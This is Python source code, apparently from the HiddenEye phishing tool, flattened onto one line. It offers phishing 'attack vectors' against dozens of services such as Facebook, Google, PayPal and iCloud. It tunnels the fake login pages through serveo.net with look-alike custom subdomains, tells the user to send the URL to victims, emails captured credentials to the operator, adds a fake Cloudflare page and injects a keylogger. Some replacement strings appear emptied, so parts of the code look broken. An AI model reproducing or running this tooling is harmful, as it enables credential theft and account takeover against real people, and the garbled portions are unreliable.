# Any actions must be here import getpass import base64 from os import system, path from distutils.dir_util import copy_tree from time import sleep import re import json from urllib.request import urlopen from subprocess import check_output, CalledProcessError from sys import stdout, argv, exit from Defs.ThemesManager import colorSelector from Defs.Configurations import readConfig, ifSettingsNotExists from Defs.Languages import * installGetText() languageSelector() ifSettingsNotExists() config = readConfig() colorTheme = colorSelector() MAIN0, MAIN1, MAIN2, MAIN3, MAIN4 = colorTheme[0], colorTheme[ 1], colorTheme[2], colorTheme[3], colorTheme[4] def selectPort(): # Question where user must select port system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ WEBSERVER PORT SELECTION ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n {0}[{1}*{0}]{0}Select Any Available Port [1-65535]:{1}".format(MAIN0, MAIN4)) choice = input(" \n{0}HiddenEye >>> {2}".format(MAIN0, MAIN4, MAIN2)) try: if (int(choice) > 65535 or int(choice) < 1): return selectPort() else: return choice except: return selectPort() def customServeo(port): print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n\n{0}[{1}!{0}]{1} YOU CAN MAKE YOUR URL SIMILAR TO AUTHENTIC URL.\n\n{0}Insert a custom subdomain for serveo'''.format(MAIN0, MAIN2)) lnk = input("\n{0}CUSTOM Subdomain>>> {2}".format(MAIN0, MAIN4, MAIN2)) if not ".serveo.net" in lnk: lnk += ".serveo.net" else: pass system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=60 -R %s:80:localhost:%s serveo.net > link.url 2> /dev/null &' % (lnk, port)) sleep(7) try: output = check_output( "grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} SERVEO URL: {2}".format( MAIN0, MAIN2, MAIN3, port) + url + "{1}".format(MAIN0, MAIN4, MAIN3)) print("\n") except CalledProcessError: print('''\n\n{0}FAILED TO GET THIS DOMAIN. !!!\n\n{0}LOOKS LIKE CUSTOM URL IS NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE. !!!\n\n{0}[{1}!{0}]TRY TO SELECT ANOTHER CUSTOM DOMAIN{1} (GOING BACK).. !! \n '''.format(MAIN0, MAIN4)) sleep(4) system('clear') return customServeo(port) def randomServeo(port): system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ RANDOM SERVEO URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:%s serveo.net > link.url 2> /dev/null &' % (port)) sleep(8) try: output = check_output( "grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} SERVEO URL: {2}".format( MAIN0, MAIN4, MAIN3, port) + url + "{1}".format(MAIN0, MAIN4, MAIN3)) print("\n") except CalledProcessError: sleep(4) system('clear') return randomServeo(port) def runMainMenu(): # menu where user select what they wanna use # Terms Of Service sleep(6) system('clear') orange = '\033[33m' blue = '\033[34m' purple = '\033[35m' red = '\033[31m' print("\n\n\n {2}WITH GREAT {1}POWER {3}- {2}COMES GREAT {1}RESPONSIBILITY ".format(orange, red, purple, blue)) if input("\n\n\n\n{2}[{1}!{2}]{3} Do you agree to use this tool for educational/testing purposes only? {1}({0}Y{1}/{2}N{1})\n{2}HiddenEye >>> {0}".format(MAIN2, MAIN4, MAIN0, orange)).upper() != 'Y': system('clear') print("\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE.!{1} ]\n\n".format(MAIN0, MAIN4)) exit() def mainMenu(): system('clear') with open('version.txt') as f: ver_current = f.read() version = ver_current.strip() print(''' {2} ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ ███████ {1} {2} ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ ██ {1} {2} ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ ███████ {1} {2} ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ ██ {1} {2} ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ ███████ {1} {3}[{1}v {4}{3}]{1} BY:DARKSEC{2} {3}[{2} Modern Phishing Tool With Advanced Functionality {3}] {3}[{2} PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING {3}] ________________________________________________________________________________'''.format(MAIN3, MAIN4, MAIN2, MAIN0, version)) print("------------------------\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n------------------------".format(MAIN0, MAIN2)) print("\n{0}PHISHING-MODULES:".format(MAIN0, MAIN2)) print(" {0}[{1}01{0}]{1} Facebook {0}[{1}13{0}]{1} Steam {0}[{1}25{0}]{1} Badoo {0}[{1}37{0}]{1} PlayStation".format(MAIN0, MAIN2)) print(" {0}[{1}02{0}]{1} Google {0}[{1}14{0}]{1} VK {0}[{1}26{0}]{1} CryptoCurrency {0}[{1}38{0}]{1} Xbox".format( MAIN0, MAIN2)) print(" {0}[{1}03{0}]{1} LinkedIn {0}[{1}15{0}]{1} iCloud {0}[{1}27{0}]{1} DevianArt {0}[{1}39{0}]{1} CUSTOM(1)".format( MAIN0, MAIN2)) print(" {0}[{1}04{0}]{1} GitHub {0}[{1}16{0}]{1} GitLab {0}[{1}28{0}]{1} DropBox {0}[{1}40{0}]{1} CUSTOM(2)".format( MAIN0, MAIN2)) print(" {0}[{1}05{0}]{1} StackOverflow {0}[{1}17{0}]{1} Netflix {0}[{1}29{0}]{1} eBay ".format( MAIN0, MAIN2)) print(" {0}[{1}06{0}]{1} WordPress {0}[{1}18{0}]{1} Origin {0}[{1}30{0}]{1} MySpace ".format( MAIN0, MAIN2)) print(" {0}[{1}07{0}]{1} Twitter {0}[{1}19{0}]{1} Pinterest {0}[{1}31{0}]{1} PayPal ".format( MAIN0, MAIN2)) print(" {0}[{1}08{0}]{1} Instagram {0}[{1}20{0}]{1} ProtonMail {0}[{1}32{0}]{1} Shopify".format( MAIN0, MAIN2)) print(" {0}[{1}09{0}]{1} Snapchat {0}[{1}21{0}]{1} Spotify {0}[{1}33{0}]{1} Verizon ".format( MAIN0, MAIN2)) print(" {0}[{1}10{0}]{1} Yahoo {0}[{1}22{0}]{1} Quora {0}[{1}34{0}]{1} Yandex ".format( MAIN0, MAIN2)) print(" {0}[{1}11{0}]{1} Twitch {0}[{1}23{0}]{1} PornHub {0}[{1}35{0}]{1} Reddit ".format( MAIN0, MAIN2)) print(" {0}[{1}12{0}]{1} Microsoft {0}[{1}24{0}]{1} Adobe {0}[{1}36{0}]{1} Subito.it ".format( MAIN0, MAIN2)) print("\n{0}SOCIAL-ENGINEERING-TOOLS:".format(MAIN0, MAIN2)) print(" {0}[{1}A{0}]{1} Get Victim Location".format(MAIN0, MAIN2)) option = input("\n{0}HiddenEye >>> {1}".format(MAIN0, MAIN2)) if option == '1' or option == '01': loadModule('Facebook') customOption = input("\nOperation mode:\n {0}[{1}1{0}]{1} Standard Page Phishing\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('Facebook', customOption) elif option == '2' or option == '02': loadModule('Google') customOption = input( "\nOperation mode:\n {0}[{1}1{0}]{1} Standard Page Phishing\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n {0}[{1}3{0}]{1} New Google Web\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('Google', customOption) elif option == '3' or option == '03': loadModule('LinkedIn') customOption = '' runPhishing('LinkedIn', customOption) elif option == '4' or option == '04': loadModule('GitHub') customOption = '' runPhishing('GitHub', customOption) elif option == '5' or option == '05': loadModule('StackOverflow') customOption = '' runPhishing('StackOverflow', customOption) elif option == '6' or option == '06': loadModule('WordPress') customOption = '' runPhishing('WordPress', customOption) elif option == '7' or option == '07': loadModule('Twitter') customOption = '' runPhishing('Twitter', customOption) elif option == '8' or option == '08': loadModule('Instagram') customOption = input("\nOperation mode:\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (To Lure The Users)\n {0}[{1}3{0}]{1} Instagram Advanced Scenario (Appears as Instagram Profile)\n {0}[{1}4{0}]{1} Instagram Verified Badge Attack (Lure To Get Blue Badge){1} *[NEW]*\n {0}[{1}5{0}]{1} Instafollower (Lure To Get More Followers){1} *[NEW]*\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('Instagram', customOption) elif option == '9' or option == '09': loadModule('Snapchat') customOption = '' runPhishing('Snapchat', customOption) elif option == '10': loadModule('Yahoo') customOption = '' runPhishing('Yahoo', customOption) elif option == '11': loadModule('Twitch') customOption = '' runPhishing('Twitch', customOption) elif option == '12': loadModule('Microsoft') customOption = '' runPhishing('Microsoft', customOption) elif option == '13': loadModule('Steam') customOption = '' runPhishing('Steam', customOption) elif option == '14': loadModule('VK') customOption = input( "\nOperation mode:\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN4, MAIN2)) runPhishing('VK', customOption) elif option == '15': loadModule('iCloud') customOption = '' runPhishing('iCloud', customOption) elif option == '16': loadModule('GitLab') customOption = '' runPhishing('GitLab', customOption) elif option == '17': loadModule('NetFlix') customOption = '' runPhishing('NetFlix', customOption) elif option == '18': loadModule('Origin') customOption = '' runPhishing('Origin', customOption) elif option == '19': loadModule('Pinterest') customOption = '' runPhishing('Pinterest', customOption) elif option == '20': loadModule('ProtonMail') customOption = '' runPhishing('ProtonMail', customOption) elif option == '21': loadModule('Spotify') customOption = '' runPhishing('Spotify', customOption) elif option == '22': loadModule('Quora') customOption = '' runPhishing('Quora', customOption) elif option == '23': loadModule('PornHub') customOption = '' runPhishing('PornHub', customOption) elif option == '24': loadModule('Adobe') customOption = '' runPhishing('Adobe', customOption) elif option == '25': loadModule('Badoo') customOption = '' runPhishing('Badoo', customOption) elif option == '26': loadModule('CryptoCurrency') customOption = '' runPhishing('CryptoCurrency', customOption) elif option == '27': loadModule('DevianArt') customOption = '' runPhishing('DevianArt', customOption) elif option == '28': loadModule('DropBox') customOption = '' runPhishing('DropBox', customOption) elif option == '29': loadModule('eBay') customOption = '' runPhishing('eBay', customOption) elif option == '30': loadModule('MySpace') customOption = '' runPhishing('Myspace', customOption) elif option == '31': loadModule('PayPal') customOption = '' runPhishing('PayPal', customOption) elif option == '32': loadModule('Shopify') customOption = '' runPhishing('Shopify', customOption) elif option == '33': loadModule('Verizon') customOption = '' runPhishing('Verizon', customOption) elif option == '34': loadModule('Yandex') customOption = '' runPhishing('Yandex', customOption) elif option == '35': loadModule('Reddit') customOption = input( "\nOperation mode:\n {0}[{1}1{0}]{1} New reddit page\n {0}[{1}2{0}]{1} Old reddit page\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('Reddit', customOption) elif option == '36': loadModule('Subitoit') customOption = '' runPhishing('Subitoit', customOption) elif option == '37': loadModule('PlayStation') customOption = '' runPhishing('PlayStation', customOption) elif option == '38': loadModule('Xbox') customOption = '' runPhishing('Xbox', customOption) elif option == '39': loadModule('CUSTOM(1)') customOption = '' runPhishing('CUSTOM(1)', customOption) elif option == '40': loadModule('CUSTOM(2)') customOption = '' runPhishing('CUSTOM(2)', customOption) #Below Are Tools And Above Are Phishing Modules.. elif option == 'A' or option == 'a': loadModule('LOCATION') customOption = input( "\nOperation mode:\n {0}[{1}1{0}]{1} NEAR YOU (Webpage Looks Like Legitimate)\n {0}[{1}2{0}]{1} GDRIVE (Asks For Location Permission To redirect GDRIVE) \n\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('LOCATION', customOption) else: endMessage(port) def loadModule(module): # This one just show text.. print('''\n {0} [{1}*{0}] SELECT ANY ONE MODE...{0}\n--------------------------------'''.format(MAIN0, MAIN2)) def inputCustom(): # Question where user can input custom web-link system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ PUT YOUR REDIRECTING URL HERE ] {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print( '''\n{1}**{0}(Do not leave it blank. Unless Errors may occur)'''.format(MAIN2, MAIN4)) print( '''\n{0}[{1}*{0}]{0}Insert a custom redirect url:'''.format(MAIN0, MAIN4)) custom = input('''\n{0}REDIRECT HERE>>> {2}'''.format(MAIN0, MAIN4, MAIN2)) if 'http://' in custom or 'https://' in custom: pass else: custom = 'http://' + custom if path.exists('Server/www/js/location.js'): # For Location (gdrive) Template Redirection. with open('Server/www/js/location.js') as f: read_data = f.read() c = read_data.replace('', custom) f = open('Server/www/js/location.js', 'w') f.write(c) f.close() if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'): with open('Server/www/login.php') as f: read_data = f.read() c = read_data.replace('', custom) f = open('Server/www/login.php', 'w') f.write(c) f.close() with open('Server/www/post.php') as f: read_data = f.read() c = read_data.replace('', custom) f = open('Server/www/post.php', 'w') f.write(c) f.close() else: with open('Server/www/login.php') as f: read_data = f.read() c = read_data.replace('', custom) f = open('Server/www/login.php', 'w') f.write(c) f.close() def emailPrompt(): system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {1}http://github.com/darksecdevelopers {0}** BY: {1}DARKSEC {0}** '''.format(MAIN0, MAIN2)) print( "-------------------------------\n{0}[ PROMPT: NEED CAPTURED DATA TO EMAIL ? ]{1}!! {0}\n-------------------------------".format(MAIN0, MAIN4)) addingEmail() def addingEmail(): print("\n{0}[{1}!{0}]{1}No Need To Configure, If you have Already Done. ".format( MAIN0, MAIN4)) print("\n{0}[{1}*{0}]{0}DO YOU WANT CAPTURED DATA TO BE EMAILED, THEN CREATE CONFIG FILE -{1}(Y/N)".format(MAIN0, MAIN4)) choice = input("\n\n{1}{0}YOUR CHOICE >>> {2}".format( MAIN0, MAIN4, MAIN2)).upper() if choice == 'Y': print("\n{0}[{1}!{0}] BEFORE STARTING MAKE SURE THESE THINGS: \n\n{0}[{1}+{0}] {1}YOU HAVE CORRECT GMAIL USERNAME & PASSWORD\n{0}[{1}+{0}] {1}YOU HAVE DISABLED 2-FACTOR AUTHENTICATION FROM YOUR GMAIL ACCOUNT\n{0}[{1}+{0}] {1}YOU HAVE TURNED ON LESS SECURED APPS \n (https://myaccount.google.com/lesssecureapps) \n\n".format(MAIN0, MAIN4)) input('[.] Press Enter To Start Configuring Gmail Credential File...') emailPrompt2() elif choice == 'N': pass else: print('[^] ERROR: Please choose correct option to continue...') sleep(1) emailPrompt() def emailPrompt2(): system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {1}http://github.com/darksecdevelopers {0}** BY: {1}DARKSEC {0}** '''.format(MAIN0, MAIN2)) print( "-------------------------------\n{0}[ PROMPT: CONFIG EMAIL CREDENTIAL FILE ]{1}!! {0}\n-------------------------------".format(MAIN0, MAIN4)) emailConfig() def emailConfig(): system('cp Defs/Send_Email/EmailConfigDefault.py Defs/Send_Email/emailconfig.py') GMAILACCOUNT = input( "{0}[{1}+{0}]{0} Enter Your Gmail Username:{1} ".format(MAIN0, MAIN4)) with open('Defs/Send_Email/emailconfig.py') as f: read_data = f.read() c = read_data.replace('GMAILACCOUNT', GMAILACCOUNT) f = open('Defs/Send_Email/emailconfig.py', 'w') f.write(c) f.close() print("{0}[.] {1}Email Address Added To config File. !\n".format( MAIN0, MAIN4)) GMAILPASSWORD = getpass.getpass( "{0}[{1}+{0}]{0} Enter Your Gmail Password:{1} ".format(MAIN0, MAIN4)) with open('Defs/Send_Email/emailconfig.py') as f: read_data = f.read() GMAILPASSWORD = base64.b64encode(GMAILPASSWORD.encode()) GMAILPASSWORD = (GMAILPASSWORD.decode('utf-8')) c = read_data.replace('GMAILPASSWORD', GMAILPASSWORD) f = open('Defs/Send_Email/emailconfig.py', 'w') f.write(c) f.close() print("{0}[.] {1}Password(Encoded) Added To config File. !\n".format( MAIN0, MAIN4)) RECIPIENTEMAIL = input( "{0}[{1}+{0}]{0} Enter Recipient Email:{1} ".format(MAIN0, MAIN4)) with open('Defs/Send_Email/emailconfig.py') as f: read_data = f.read() c = read_data.replace('RECIPIENTEMAIL', RECIPIENTEMAIL) f = open('Defs/Send_Email/emailconfig.py', 'w') f.write(c) f.close() print("{0}[.] {1}Recipient Email Address Added To config File. !\n".format( MAIN0, MAIN4)) print( '\n\n{0}[{1}SUCCESS{0}]{0}: Created Config File & Saved To (Defs/Send_Email/Config.py)'.format(MAIN0, MAIN4)) def cloudflarePrompt(): system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {1}http://github.com/darksecdevelopers {0}** BY: {1}DARKSEC {0}** '''.format(MAIN0, MAIN2)) print( "-------------------------------\n{0}[ CLOUDFARE PROTECTION PROMPT ]{1}!! {0}\n-------------------------------".format(MAIN0, MAIN4)) addingCloudfare() def addingCloudfare(): print("\n{0}[{1}*{0}]{0}DO YOU WANT TO ADD A CLOUDFARE PROTECTION FAKE PAGE -{1}(Y/N)".format(MAIN0, MAIN4)) choice = input("\n\n{1}{0}YOUR CHOICE >>> {2}".format( MAIN0, MAIN4, MAIN2)).upper() if choice == 'Y': addCloudfare() else: sleep(1) def addCloudfare(): system('mv Server/www/index.* Server/www/home.php && cp WebPages/cloudfare.html Server/www/index.html') print("\n{0}[{1}#{0}]CLOUDFARE FAKE PAGE{0} ADDED...".format(MAIN0, MAIN4)) sleep(1) def keyloggerprompt(): system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {1}http://github.com/darksecdevelopers {0}** BY: {1}DARKSEC {0}** '''.format(MAIN0, MAIN2)) print( "-------------------------------\n{0}[ KEYLOGGER PROMPT ]{1}!! {0}\n-------------------------------".format(MAIN0, MAIN4)) def addingkeylogger(): print("\n{0}[{1}!{0}]{1}ATTENTION: Adding Keylogger Mostly Kills the Tunnel Connection.\n".format( MAIN0, MAIN4)) print("\n{0}[{1}*{0}]{0}DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-{1}(Y/N)".format(MAIN0, MAIN4)) choice = input("\n\n{1}{0}YOUR CHOICE >>> {2}".format( MAIN0, MAIN4, MAIN2)).upper() if choice == 'Y': addkeylogger() else: sleep(1) def addkeylogger(): if path.exists('Server/www/index.html'): with open('Server/www/index.html') as f: read_data = f.read() c = read_data.replace( '', '') f = open('Server/www/index.html', 'w') f.write(c) f.close() print("\n{0}[{1}#{0}]Keylogger{0} ADDED !!!".format(MAIN0, MAIN4)) sleep(2) else: with open('Server/www/index.php') as f: read_data = f.read() c = read_data.replace( '', '') f = open('Server/www/index.php', 'w') f.write(c) f.close() print("\n{0}[{1}#{0}]Keylogger{0} ADDED !!!".format(MAIN0, MAIN4)) sleep(2) def runServer(port): system("fuser -k %s/tcp > /dev/null 2>&1" % (port)) system("cd Server/www/ && php -S > /dev/null 2>&1 &" % (port)) def returnServer(port): selectServer(port)